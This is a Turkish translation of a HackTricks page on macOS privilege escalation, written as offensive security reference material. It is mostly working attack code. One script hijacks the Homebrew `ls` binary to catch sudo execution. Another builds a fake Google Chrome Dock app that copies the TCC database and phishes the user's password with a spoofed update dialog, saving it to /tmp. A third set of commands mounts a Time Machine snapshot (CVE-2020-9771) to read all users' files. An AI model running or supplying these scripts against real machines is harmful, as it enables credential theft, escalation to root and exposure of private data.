macOS Privilege Escalation

HackTricks'i Destekleyin

TCC Yetki Yükseltme

Eğer TCC yetki yükseltme ile ilgili bilgi arıyorsanız, buraya gidin:

Linux Privesc

Lütfen Linux/Unix üzerinde etkili olan yetki yükseltme ipuçlarının çoğunun MacOS makinelerini de etkileyeceğini unutmayın. Bu yüzden:

Kullanıcı Etkileşimi

Sudo Ele Geçirme

Orijinal Sudo Ele Geçirme tekniğini Linux Yetki Yükseltme yazısında bulabilirsiniz.

Ancak, macOS kullanıcının PATH'ini sudo komutunu çalıştırdığında korur. Bu, bu saldırıyı gerçekleştirmenin başka bir yolunun, mağdurun sudo çalıştırırken yine de çalıştıracağı diğer ikili dosyaları ele geçirmek olacağı anlamına gelir:

# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls

Not edin ki terminal kullanan bir kullanıcının Homebrew yüklü olma olasılığı yüksektir. Bu nedenle /opt/homebrew/bin içindeki ikili dosyaları ele geçirmek mümkündür.

Dock Taklit Etme

Bazı sosyal mühendislik teknikleri kullanarak dock içinde örneğin Google Chrome'u taklit edebilir ve aslında kendi scriptinizi çalıştırabilirsiniz:

Bazı öneriler:

  • Dock'ta bir Chrome olup olmadığını kontrol edin, eğer varsa o girişi kaldırın ve Dock dizisinde aynı konuma sahte Chrome girişini ekleyin.

#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock

TCC - Root Yetki Yükseltme

CVE-2020-9771 - mount_apfs TCC atlatma ve yetki yükseltme

Herhangi bir kullanıcı (hatta yetkisiz olanlar bile) bir zaman makinesi anlık görüntüsü oluşturabilir ve bu anlık görüntünün TÜM dosyalarına erişebilir. Gerekli olan tek yetki, kullanılan uygulamanın (örneğin Terminal) Tam Disk Erişimi (FDA) erişimine sahip olmasıdır (kTCCServiceSystemPolicyAllfiles), bu da bir yönetici tarafından verilmelidir.

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

Daha ayrıntılı bir açıklama orijinal raporda** bulunabilir.**

Hassas Bilgiler

Bu, ayrıcalıkları artırmak için faydalı olabilir:

HackTricks'i Destekleyin

Last updated